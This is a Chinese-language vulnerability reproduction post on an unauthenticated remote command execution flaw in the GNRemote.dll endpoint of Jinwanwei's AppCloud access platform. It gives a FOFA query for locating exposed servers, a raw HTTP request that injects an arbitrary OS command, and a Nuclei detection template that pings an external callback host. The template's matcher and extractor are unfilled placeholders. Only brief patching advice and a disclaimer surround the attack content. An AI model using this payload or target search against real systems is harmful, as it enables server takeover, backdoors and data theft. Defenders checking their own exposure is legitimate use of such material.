【漏洞复现】金万维-云联应用系统接入平台 GNRemote.dll 前台RCE

0x00 漏洞描述

云联（AppCloud）是北京金万维科技有限公司的企业级私有云产品。
金万维-云联应用系统接入平台 GNRemote.dl接口存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x01 测绘工具

fofa: title="云联应用系统接入平台

0x02 漏洞复现

GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

0x03 Nuclei检测脚本

id: 金万维-云联应用系统接入平台 GNRemote.dll 前台RCE

info:
  name: G金万维-云联应用系统接入平台 GNRemote.dll 前台RCE
  author: admin
  severity: critical
  description: 金万维-云联应用系统接入平台 GNRemote.dll 前台RCE
  tags: command-injection, rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=ping+cumeyvrvdy.dgrh3.cn"

    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
      Accept-Encoding: "gzip, deflate"
      Accept-Language: "zh-CN,zh;q=0.9"
      Connection: "close"

    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "expected content indicating successful command execution"

    extractors:
      - type: regex
        regex:
          - "regex_to_extract_specific_response_part"

0x04 修复建议

关闭互联网暴露面或接口设置访问权限
升级至安全版本

0x05 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。